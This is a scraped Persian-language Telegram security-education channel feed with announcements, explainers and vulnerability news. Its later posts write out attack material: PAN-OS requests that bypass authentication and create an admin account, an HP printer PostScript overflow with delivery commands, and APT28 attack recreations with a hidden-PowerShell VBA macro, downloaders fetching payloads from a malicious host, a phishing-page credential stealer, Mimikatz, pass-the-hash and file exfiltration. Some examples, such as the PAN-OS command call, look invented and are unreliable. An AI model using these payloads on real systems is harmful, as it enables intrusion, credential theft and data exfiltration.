لیان - آموزش امنیت و تستنفوذ
1-20.pdf
389.9 KB
Please open Telegram to view this post
VIEW IN TELEGRAM
👌7👍2❤1
کاش شرایط جوری بود که میتونستیم بوتکمپهای رایگان بیشتری رو قرار بدیم.
همینجا از اساتیدی که مایل هستن تو برگزاری بوتکمپهای رایگان (۱۰ الی ۱۴ساعت) همکاری داشته باشن، دعوت میکنم که از طریق آیدی زیر با من در تماس باشند:
@vahid_elmi
🔫 🔫 🔫 🔫 🔫 🔫 🔫 🔫 🫡 🔫 🔫
⏩ @CyberWarfar
همینجا از اساتیدی که مایل هستن تو برگزاری بوتکمپهای رایگان (۱۰ الی ۱۴ساعت) همکاری داشته باشن، دعوت میکنم که از طریق آیدی زیر با من در تماس باشند:
@vahid_elmi
Please open Telegram to view this post
VIEW IN TELEGRAM
👏6👍4❤3👌1
Please open Telegram to view this post
VIEW IN TELEGRAM
❤7⚡4❤🔥4🎉1👌1
Cyber Warfar
LianGroup.net – اپیزود 72 رادیو امنیت - نقشه راه امنیت سایبری - مقدمات
اپیزود 75 رادیو امنیت - نقشه راه امنیت سایبری - پیشنیازها
LianGroup.net
🎙 تو قسمت دوم، در مورد پیشنیازهای اولیه برای ورود به حوزه امنیت سایبری صحبت کردم.
🔗 لینک CastBox:
https://lian.ac/Srd
🔫 🔫 🔫 🔫 🔫 🔫 🔫 🔫 🫡 🔫 🔫
⏩ @CyberWarfar
https://lian.ac/Srd
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡6❤5👌4
همونطور که میدونیم ایمیلهای فیشینگ معمولا و به ظاهر از سمت یه سازمان معروف و شناخته شده ارسال میشن و هدفشون هم سرقت اطلاعات شخصی شما مثل شماره کارت اعتباری، اطلاعات هویتی و یوزرنیم و پسورده. و برای اینکه هکر بتونه با موفقیت اطلاعات شخصی شمارو "فیش" کنه، باید شمارو وادار کنه که از ایمیلی که براتون ارسال کرده، وارد یه وبسایتی بشین (که جعلیه). اینطوری هم هست که به قید فوریت و ایجاد استرس و تهدید (مثل این مورد که اگه کاری رو انجام ندین، حسابتون مسدود میشه)، شمارو ترغیب به کلیک روی لینک داخل ایمیل میکنن. لینکی که شمارو هدایت میکنه به سمت سایتی که اطلاعات شخصی شمارو ازتون درخواست میکنه.
فیشتانک یه دیتابیس و سرویس آنلاینه که هدفش از راهاندازی، مبارزه علیه حملات فیشینگه. فیشتانک با جمعآوری اطلاعات در مورد صفحات فیکی که برای حملات فیشینگ طراحی شدن، به شناسایی و مقابله با این تهدیدات کمک میکنه.
فیشتانک اول میاد با استفاده از یه سری روشهای مختلف (از گزارشهای کاربرا گرفته تا اسکن خودکاری و همکاری با بقیه سازمانها)، اطلاعات مربوط به صفحات فیشینگ رو جمع میکنه. بعدش میاد اطلاعاتی که جمع کرده رو آنالیز میکنه و صفحات فیشینگ رو براساس ویژگیهای مختلفی مثل دامنه، محتوا و تکنیکهایی که توش استفاده شده، طبقهبندی میکنه. بعدش هم این اطلاعاتی که جمعشون کرده و طبقهبندی هم کرده رو با بقیه سازمانها و ابزارهای امنیتی به اشتراک میزاره و در نهایت یه API هم ارائه میده که به دولوپرها و ریسرچرها اجازه بده تا بدون هزینه به دیتای ضدفیشینگ دسترسی داشته باشن و با برنامههای خودشون ادغامش کنن.
در نهایت هم بگم که PhishTank رو مرکز Talos سیسکو داره اداره میکنه.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5❤4👏4❤🔥1🙏1👌1
Users running Tomcat on a case insensitive file system with the default servlet write enabled (readonly initialisation parameter set to the non-default value of false) may need additional configuration to fully mitigate CVE-2024-50379 depending on which version of Java they are using with Tomcat.
Tomcat 11.0.0-M1 to 11.0.1 (Fixed in 11.0.2+)
Tomcat 10.1.0-M1 to 10.1.33 (Fixed in 10.1.34+)
Tomcat 9.0.0.M1 to 9.0.97 (Fixed in 9.0.98+)
Users of the affected versions should apply one of the following mitigations:
- Upgrade to Apache Tomcat 11.0.2 or later
- Upgrade to Apache Tomcat 10.1.34 or later
- Upgrade to Apache Tomcat 9.0.98 or later
- running on Java 8 or Java 11: the system property sun.io.useCanonCaches must be explicitly set to false (it defaults to true)
- running on Java 17: the system property sun.io.useCanonCaches, if set, must be set to false (it defaults to false)
- running on Java 21 onwards: no further configuration is required (the system property and the problematic cache have been removed)
Please open Telegram to view this post
VIEW IN TELEGRAM
🤯8🥰5😢4👌1
با تکامل فناوری ایمیل، فناوریهای محافظت از اون هم تکامل پیدا کردن و با تکامل این فناوریها، الگوهای حمله هم تکامل و تغییر پیدا کردن و مثل هر موضوع دیگهای تو حوزه امنیت اطلاعات، یه بازی مداوم موش و گربه اینجا هم وجود داره. با گذشت زمان متخصصای امنیت انواع مختلفی از استانداردها رو برای بحث امنیت ایمیل پیشنهاد و تصویب کردن. وقتی صحبت از ایمنسازی ایمیل میشه، سه مورد اصلی وجود داره:
• Domain Keys Identified Mail (DKIM)
• Sender Policy Framework (SPF)
• Domain-based Message Authentication Reporting Conformance (DMARC)
یه تصور غلط رایج اینه که این استانداردها ایمیلهای مارو از حملههای فیشینگ یا جعلی ورودی، محافظت میکنن؛ تا حدودی این کارو انجام میدن، اما دقیقترش اینه که اونارو بعنوان محافظت از شهرت و برند باید توصیف کنیم. اگر ما یه ایمیل رو با پیادهسازی این استانداردها ارسال کنیم و دامنه گیرنده برای بررسی رکوردهای مرتبط پیکربندی شده باشه، میتونن تلاشهای جعل دامنه مارو تشخیص بدن.
به طور خلاصه SPF بررسی میکنه که آیا هاست یا آدرس IP تو لیست فرستده هست، DKIM یه امضای دیجیتال ارسال میکنه و DMARC، هم SPF و هم DKIM رو پیادهسازی میکنه. DMARC گزارشدهی رو هم ایجاد میکنه و SPF پایینترین استاندارد امنیتی در نظر گرفته میشه.
- برگرفته از کتاب مهندسی اجتماعی برای سازمانها
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7❤4👏4🤩1👌1
سلام.
من عادت دارم وقتی تو ماشین هستم پادکست گوش کنم و طبق عادت امروز هم از چنل رخ، شروع کردم انتخاب پادکست. موضوعی که توجهم رو جلب کرد این بود که با موضوع زندگینامه "کوین میتنیک" پادکستی ساختن که واقعا جالب و شنیدنی هست. دوستانی که تو حوزه امنیت فعال هستن احتمالا حداقل یکبار اسم میتنیک به گوششون خورده. ایشون رو با لقبهای "بزرگترین هکر قرن" و "پدر مهندسی اجتماعی" میشناسن. به نظرم جالب هست که زندگینامه یکی از مهمترین شخصیتهای حوزهمون رو بدونیم. البته ایشون تو جولای 2023 از دنیا رفتند.
⬅️ قسمت اول:
https://lian.ac/RDG
⬅️ قسمت دوم:
https://lian.ac/XvC
⬅️ قسمت سوم:
https://lian.ac/SqC
🔫 🔫 🔫 🔫 🔫 🔫 🔫 🔫 🫡 🔫 🔫
⏩ @CyberWarfar
من عادت دارم وقتی تو ماشین هستم پادکست گوش کنم و طبق عادت امروز هم از چنل رخ، شروع کردم انتخاب پادکست. موضوعی که توجهم رو جلب کرد این بود که با موضوع زندگینامه "کوین میتنیک" پادکستی ساختن که واقعا جالب و شنیدنی هست. دوستانی که تو حوزه امنیت فعال هستن احتمالا حداقل یکبار اسم میتنیک به گوششون خورده. ایشون رو با لقبهای "بزرگترین هکر قرن" و "پدر مهندسی اجتماعی" میشناسن. به نظرم جالب هست که زندگینامه یکی از مهمترین شخصیتهای حوزهمون رو بدونیم. البته ایشون تو جولای 2023 از دنیا رفتند.
https://lian.ac/RDG
https://lian.ac/XvC
https://lian.ac/SqC
Please open Telegram to view this post
VIEW IN TELEGRAM
👍12🙏4👌4
برای اینکه این ریسک شناسایی کمتر بشه پیشنهاد میشه این سه رول داخل فایروال ست بشن:
cd /opt/
git clone https://github.com/gophish/gophish
cd gophish
apt-get install golang -y
go get github.com/gophish/gophish
go build
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7👏5❤4👌1💯1
Please open Telegram to view this post
VIEW IN TELEGRAM
🌚7👍4🔥3❤1👏1🤔1🥴1👨💻1
https://www.aparat.com/playlist/1569341
Please open Telegram to view this post
VIEW IN TELEGRAM
آپارات - سرویس اشتراک ویدیو
Memory Forensics جرم یابی حافظه - لیست پخش
1-Basic Memory Forensic:Introduction آموزش جرم یابی حافظه با volatility,2-Basic Memory Forensic:Forensics values and processes,3-Basic Memory Forensic:Virtual Memory,4-Basic Memory Forensic:Volatility Overview,5-Basic Memory Forensic:supported OS and Images…
🔥10👍5👏2👌1
75836 Document.pdf
3.7 MB
Please open Telegram to view this post
VIEW IN TELEGRAM
🤯12👍5🤬3🤔1😢1
FortiOS نسخههای 7.0.0 تا 7.0.16
FortiProxy نسخههای 7.0.0 تا 7.0.19 و 7.2.0 تا 7.2.12
این نقص بهعنوان «دور زدن احراز هویت با استفاده از مسیر یا کانال جایگزین» (CWE-288) طبقهبندی میشه. مهاجم با ارسال درخواستهای دستکاریشده به ماژول WebSocket تو ۸ Node.js میتونه کنترل کامل دستگاه ره به دست بگیره.
شاخصهای سازشی (IoC):
ورودهای لاگ زیر ممکنه نشوندهنده اکسپلویت از این آسیبپذیری باشن:
ورود موفق ادمین با رابط کاربری "jsconsole" و آدرسهای IP مثل 1.1.1.1 یا 127.0.0.1:
type="event" subtype="system" level="information" vd="root" logdesc="Admin login successful" user="admin" ui="jsconsole" method="jsconsole" srcip=1.1.1.1 action="login" status="success" profile="super_admin" msg="Administrator admin logged in successfully from jsconsole"
ایجاد حساب ادمین با نام کاربری تصادفی:
type="event" subtype="system" level="information" vd="root" logdesc="Object attribute configured" user="admin" ui="jsconsole(127.0.0.1)" action="Add" cfgpath="system.admin" cfgobj="vOcep" msg="Add system.admin vOcep"
توجه داشته باشید که آدرسهای IP ذکرشده ممکنه توسط مهاجم بهصورت دلخواه تنظیم شده باشن و لزوماً نشوندهنده منبع واقعی حمله نیستن.
راهکارها:
1. بهروزرسانی نرمافزار:
برای FortiOS: به نسخه 7.0.17 یا بالاتر ارتقا بدین.
برای FortiProxy: به نسخه 7.0.20 یا 7.2.13 یا بالاتر ارتقا بدین.
2. غیرفعالسازی رابط مدیریتی HTTP/HTTPS:
در صورت امکان، این رابطها رو غیرفعال کنین یا دسترسی به اونارو محدود کنین.
3. محدود کردن دسترسی به رابط مدیریتی:
با استفاده از پالیسیهای لوکال (local-in policies)، دسترسی به رابط مدیریتی رو به آدرسهای IP مشخص محدود کنین.
4. استفاده از یوزرنیمهای غیرمعمول برای ادمین:
استفاده از یوزرنیمهای پیچیده و غیرقابل حدس برای حسابهای ادمین میتونه تا حدی از اکسپلویت جلوگیری کنه.
توجه داشته باشین که این آسیبپذیری بهطور فعال در حال بهرهبرداریه و توصیه میشه اقدامات لازم را تو اسرع وقت انجام بدین.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5😈4❤3🔥2💩1🌚1🤨1
روش نفوذ بهصورت "Zero-Click" انجام شده؛ به این معنی که تارگت بدون نیاز به کلیک یا تعامل با محتوای مخرب، آلوده شده. تو این روش، هکرها فایلای PDF حاوی کدهای مخرب رو برای تارگت ارسال کردن که با باز کردن این فایلا، جاسوسافزار بهصورت خودکار فعال میشده.
جاسوسافزار Graphite، محصول Paragon، قادره به دیتای شخصی کاربرا دسترسی پیدا کنه، از جمله:
Please open Telegram to view this post
VIEW IN TELEGRAM
Castbox
اپیزود 22: رادیو امنیت: معرفی شرکت جاسوسی سایبری NSO
<p>در این قسمت از برنامه رادیو امنیت گروه لیان، با یکی از معروفترین و همچنین ترندترین شرکتهای جاسوسی سایبری دنیا، یعنی شرکت اِناِساو آشنا میشیم و ب...
👍11❤🔥4❤2👌1😍1🌚1
یکی از متودولوژیهایی که تو این حوزه شناخته شدهاس، فریمورک STRIDE هست که توسط شرکت مایکروسافت توسعه داده شده و برای شناسایی، دستهبندی و ارزیابی تهدیدات امنیتی تو سیستمهای نرمافزاری و شبکهها ازش استفاده میشه.
تو این حمله، مهاجم هویت یه کاربر، فرآیند یا سیستم دیگه رو جعل میکنه تا دسترسی غیرمجاز به اطلاعات و منابع داشته باشه.
تو این حمله، مهاجم دیتاهای تو حال ترنسفر یا ذخیرهشده رو تغییر میده تا اطلاعات مخرب یا نادرست جایگزین بشن.
این نوع تهدید وقتی رخ میده که کاربر یا مهاجم بعد از انجام یه عملیات، اون رو انکار کنه و سیستم مدرکی برای اثبات اون نداشته باشه.
این نوع تهدید وقتی رخ میدهه که دیتاهای محرمانه در اختیار افراد غیرمجاز قرار بگیرن.
این نوع حمله باعث میشه که یه سیستم یا سرویس، دیگه تو دسترس کاربرای مجاز نباشه.
تو این حمله، مهاجم دسترسیهای خودش رو از سطح عادی به سطح مدیر (Administrator) افزایش میده.
پ.ن: این محتوا برگرفته از کتاب "راهنمای معماری امنیت سایبری" هست. برای تهیه این کتاب میتونین به آیدی @liantrain پیام بدین.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8❤3👌3👏1🎉1🕊1🌚1💯1🏆1
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5⚡3❤2🔥1🤔1🎉1🤩1🕊1🤡1💯1🏆1
مهاجم میتونه با ارسال یک درخواست (HTTP Request) دستکاریشده به سرور PAN-OS، احراز هویت رو دور بزنه.
GET /php/system.php HTTP/1.1
Host: target-firewall
User-Agent: Mozilla/5.0
ریکوئست بالا بدون نیاز به لاگین، به سرور ارسال میشه و تو بعضی نسخههای آسیبپذیر، سرور پاسخ معتبر ارسال میکنه. اگه این صفحه مدیریتی دسترسی به اسکریپتهای PHP داشته باشه، مهاجم میتونه دستورات مخرب اجرا کنه.
از اونجایی که PAN-OS بعضی اسکریپتهای PHP اجرایی داره، اگه مهاجم موفق بشه از صفحات بدون احراز هویت ریکوئستهایی بفرسته که به پارامترهای ورودی PHP دسترسی دارن، میتونه کد دلخواه رو اجرا کنه.
GET /php/admin.php?cmd=whoami HTTP/1.1
Host: firewall-target
اگر سرور پاسخ بده:
admin
نشان میده که مهاجم میتونه دستورات سیستمی رو روی سرور اجرا کنه.
اگه مهاجم موفق به ارسال ریکوئست معتبر بدون احراز هویت بشه، میتونه:
یه کاربر جدید تو سیستم ایجاد کنه.
رولهای فایروال رو تغییر بده و ترافیک رو به نفع خودش route کنه.
تنظیمات لاگ رو غیرفعال کنه تا فعالیتهای مخرب شناسایی نشه.
مثال درخواست مخرب برای ایجاد یه کاربر جدید:
POST /php/api.php HTTP/1.1
Host: target-firewall
Content-Type: application/json
{
"action": "createUser",
"username": "hacker",
"password": "SuperSecretPass",
"role": "admin"
}
اگه سرور آسیبپذیر باشه، ریکوئست بالا یه حساب ادمین جدید برای مهاجم ایجاد میکنه.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤10👌5👍4🔥2👏1
آسیبپدیری با شناسه CVE-2025-26506 تو پرینترهای HP شناسایی شده. این آسیبپذیری از نوع Stack-Based Buffer Overflow - CWE-121ه که موقع پردازش فایلهای PostScript تو پرینترهای HP رخ میده. تو این نوع حمله، ورودی فراتر از اندازه بافر تعیینشده به داخل استک نوشته میشه، که در صورت اکسپلویت موفق، میتونه منجر به RCE بشه. هکر میتونه با ارسال یه فایل PostScript مخرب، کد دلخواهش رو بصورت ریموت اجرا کنه و سطح دسترسیش رو افزایش بده.
مهاجم برای اکسپلویت این آسیبپذیری، یه فایل PostScript مخرب رو به پرینتر ارسال میکنه. این کارو میتونه از طریق روشهای زیر انجام بده:
پس از پردازش فایل، مقدار زیادی دیتا به بافر استک نوشته میشه که باعث خرابی حافظه میشه و کنترل پردازش رو به هکر منتقل میکنه.
هکر ابتدا باید تعیین کنه که آیا پرینتر هدف، جز مدلهای آسیبپذیر هست یا نه. این کار از طریق دو روش زیر میتونه انجام بشه:
اسکن شبکه با استفاده از ابزارهایی مثل nmap:
nmap -p 9100,515,631 -A -T4 <target-IP>
or
nmap -p 9100,515,631 --noscript hp-jetdirect-info -O -sV <target-IP>
اگه پورت 9100 (JetDirect), پورت 515 (LPD) یا 631 (IPP) باز باشه، پرینتر مستعد حملهاس.
بررسی بنر دستگاه:
nc <target-IP> 9100
بعضی پرینترها تو ریسپانس، اطلاعات مربوط به مدل و فریمور رو ارسال میکنن.
پستاسکریپت یه زبان توصیف صفحهاس که توسط خیلی از پرینترها پشتیبانی میشه. یه نمونه کد مخرب برای سرریز بافر میتونه به این شکل باشه:
%!PS
% ایجاد یه حلقه بیپایان برای افزایش بار پردازش
userdict begin
100 dict begin
/Buffer 1024 string def
0 1 20000 {
Buffer (AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA) putinterval
} for
end
end
این کد بافر استک رو بیش از حد پر میکنه و باعث کرش یا اجرای کد دلخواه میشه.
مهاجم میتونه فایل رو با یکی از روشهای زیر به پرینتر ارسال کنه:
از طریق Netcat:
nc <target-IP> 9100 < exploit.ps
از طریق LPD (Line Printer Daemon):
lpr -H <target-IP> -P raw -o raw exploit.ps
یا اگه پرینتر به شبکهای با ایمیل متصل باشه، مهاجم میتونه فایل رو تو قالب یه پیوست برای پرینتر ارسال کنه.
در صورت موفقیت، این حمله میتواند:
اگه مهاجم کنترل یه پرینتر متصل به شبکه داخلی سازمان رو به دست بگیره، میتونه:
یک. MITM Attack: ترافیک اسناد چاپی رو رهگیری و تغییر بده.
دو. Pivot Attack: از پرینتر به عنوان نقطه محوری برای نفوذ بیشتر به شبکه استفاده کنه.
سه. Backdoor Installation: از پرینتر برای ایجاد یک نقطه دسترسی دائمی به شبکه سازمان بهره ببره.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9👍6👏2🎉2👌2
میخوام سه سناریو واقعی از نفوذهای گروه APT28 رو بزارم. موافقین؟
Anonymous Poll
89%
بله. خیلی میتونه مفید باشه.
4%
نه. به درد نمیخوره.
7%
نظر خاصی ندارم.
گروه APT28 از Spear Phishing برای نفوذ اولیه تو این سناریو استفاده کرده. یه ایمیل رسمی فیک به کارمندا ارسال شده که به نظر میرسیده از طرف یه سازمان بینالمللی معتبر مثل EU External Action Service (EEAS) باشه.
فایل آلوده (Macro-Enabled Document)
ایمیل شامل یه فایل Word آلوده بوده که از ماکرو VBA مخرب استفاده میکرده. بعد از باز شدن فایل، ماکرو فعال میشده و PowerShell رو برای دانلود بدافزار اجرا میکرده:
Sub AutoOpen()
Dim objShell As Object
Set objShell = CreateObject("WScript.Shell")
objShell.Run "powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File C:\Users\Public\update.ps1"
End Sub
فایل update.ps1 که یه اسکریپت پاورشل رمزگذاریشده بوده؛ بدافزار اصلی رو دانلود میکرده:
$download = New-Object System.Net.WebClient
$url = "https://malicious-server.com/payload.exe"
$path = "$env:APPDATA\Microsoft\Windows\update.exe"
$download.DownloadFile($url, $path)
Start-Process -FilePath $path
ویژگیهای بدافزار Seduploader
- بررسی سیستم: اطلاعات اولیه (مثل نسخه ویندوز، یوزرنیم، پردازنده) رو جمعآوری میکنه.
- اجرای دستورات از راه دور (Remote Command Execution)
- ثبت کلیدهای زدهشده (Keylogging)
- آپلود و دانلود فایلهای مخرب
- استفاده از DNS Tunneling برای ارسال اطلاعات به سرور C2
ارتباط با سرور C2 با استفاده از DNS Tunneling
بدافزار Seduploader از ریکوئستهای DNS برای ارسال اطلاعات به سرور C2 استفاده میکنه:
nslookup -type=TXT x7c9.malicious-domain.com
دیتاها به صورت Base64 یا XOR Encoding انکریپت شدهان.
یک. Credential Dumping با استفاده از Mimikatz
بعد از استقرار اولیه، APT28 از ابزار Mimikatz برای سرقت هشهای رمزعبور استفاده کرده:
privilege::debug
sekurlsa::logonpasswords
دو. Pass-the-Hash (PTH) برای دسترسی به سایر سیستمها
اعضای APT28 با استفاده از هشها به سیستمهای دیگه متصل میشدن:
psexec \\target-system -u administrator -p NTLMHASH cmd.exe
سه. Pivoting با PowerShell Empire
با دسترسی به یه سیستم جدید، برای ایجاد ارتباط مستقیم، از PowerShell Empire استفاده میشده:
Invoke-PsExec -ComputerName target-system -Command "net user /add backdoor P@ssw0rd"
ارسال دیتاهای سرقتشده با پاورشل
$bytes = [System.IO.File]::ReadAllBytes("C:\sensitive_data.pdf")
Invoke-WebRequest -Uri "https://malicious-server.com/upload" -Method POST -Body $bytesاعضای گروه APT28 موفق به استخراج اطلاعات حساس دیپلماتیک شدن.
Please open Telegram to view this post
VIEW IN TELEGRAM
👌12👍4🤩4🔥3💯3🍌3❤1❤🔥1⚡1👏1
گروه APT28 (Fancy Bear) تو سال 2016 حملهای پیشرفته به کمیته ملی دموکرات (DNC) انجام داد که منجر به نشت اطلاعات حساس از ایمیلهای مقامات عالیرتبه حزب دموکرات شد. این حمله یه عملیات پیچیده جاسوسی سایبری بود که شامل مهندسی اجتماعی، اکسپلویت آسیبپذیریها، نصب بدافزار، حرکت جانبی (lateral movement) و استخراج دیتاها بود. دیتاهای سرقت شده در نهایت توسط WikiLeaks منتشر شد که تأثیر زیادی روی انتخابات آمریکا گذاشت.
گروه APT28 از حملات Spear Phishing برای Credential Harvesting کارمندای DNC استفاده کرده. ایمیلهای فیکی که شبیه هشدارهای امنیتی گوگل بودن، برای مقامات ارسال شدن. هدف این بوده که اونا رو وادار به وارد کردن یوزرنیم و پسوردشون تو یه صفحه لاگین فیک کنن.
Subject: Unauthorized Access Detected – Change Your Password Immediately
From: Google Security Team <no-reply@security-google.com>
گروه APT28 صفحهای که مشابه صفحه لاگین گوگل بوده رو طراحی کرده. این صفحه از طریق HTML و JavaScript اطلاعات لاگین تارگت رو سرقت میکرده. یه نمونه از کد JavaScript تو صفحه لاگین فیک:
document.getElementById("login").onsubmit = function() {
fetch("https://malicious-site.com/steal", {
method: "POST",
body: JSON.stringify({
email: document.getElementById("email").value,
password: document.getElementById("password").value
})
});
};گروه APT28 از سرویسهای کوتاهکننده URL (مثل Bit.ly) برای مخفی کردن آدرس واقعی صفحه فیک استفاده کرده. مثال لینک مخرب:
https://bit.ly/secure-google-login
پس از دستیابی به پسوردها چه اتفاقی میافته؟
بعد از سرقت اعتبارنامهها، اعضای گروه تونستن به حسابهای ایمیل کارمندای DNC دسترسی پیدا کنن. اما این آخر کار نبود؛ برای کنترل گستردهتر، APT28 نیاز داشته که کنترل سیستمهای داخلی DNC رو هم در اختیار بگیره. به همین خاطر اونا بدافزار X-Agent رو مستقر میکردن.
بدافزار X-Agent با استفاده از PowerShell و رجیستری ویندوز به صورت مخفی اجرا میشده.
$wc = New-Object System.Net.WebClient
$url = "https://malicious-server.com/xagent.exe"
$path = "$env:APPDATA\chrome_update.exe"
$wc.DownloadFile($url, $path)
Start-Process -FilePath $path -WindowStyle Hidden
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v chrome_update /t REG_SZ /d C:\Users\Public\chrome_update.exe
POST /command.php HTTP/1.1
Host: malicious-server.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 50
cmd=upload&file=/Users/Admin/Documents/confidential.pdf
چطور اعضای گروه تونستن کل شبکه DNC رو آلوده کنن؟
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"
psexec \\target-system -u administrator -p NTLMHASH cmd.exe
اجرای Pivoting با PowerShell Empire
Invoke-PsExec -ComputerName target-system -Command "net user /add hacker P@ssw0rd"
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13👏4❤3💯3🔥1